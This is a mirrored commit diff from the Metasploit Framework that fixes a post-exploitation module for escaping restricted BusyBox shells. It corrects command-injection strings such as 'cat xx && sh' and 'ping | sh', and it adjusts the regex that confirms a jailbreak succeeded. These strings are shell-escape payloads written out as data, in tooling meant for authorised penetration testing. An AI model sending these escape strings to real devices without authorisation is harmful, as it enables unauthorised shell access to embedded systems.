infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix up jailbreak commands & regex for success detection

bug/bundler_fix
HD Moore 2015-09-05 22:54:07 -05:00
parent 091c4d5214
commit 8c0b0ad377
1 changed files with 6 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/post/linux/busybox/jailbreak.rb
View File

@ -19,9 +19,9 @@ class Metasploit3 < Msf::Post
'cat xx | sh',
'ping | sh',
'cat ($sh)',
'cat xx &amp;&amp; sh',
'echo xx &amp;&amp; sh',
'ping &amp;&amp; sh'
'cat xx && sh',
'echo xx && sh',
'ping && sh'
]
def initialize
@ -55,8 +55,9 @@ class Metasploit3 < Msf::Post
session.shell_write("#{command}\n")
(1..10).each do
resp = session.shell_read
vprint_status("jailbreak received: #{resp}") unless resp.nil? || resp.empty?
if resp.downcase.include?('busybox') && resp.downcase.include?('built-in shell')
next unless resp.to_s.length > 0
vprint_status("jailbreak received: #{resp}")
if resp.downcase =~ /busybox/i && resp.downcase =~ /built.*in shell/i
print_good("Jailbreak accomplished with #{command}")
return true
end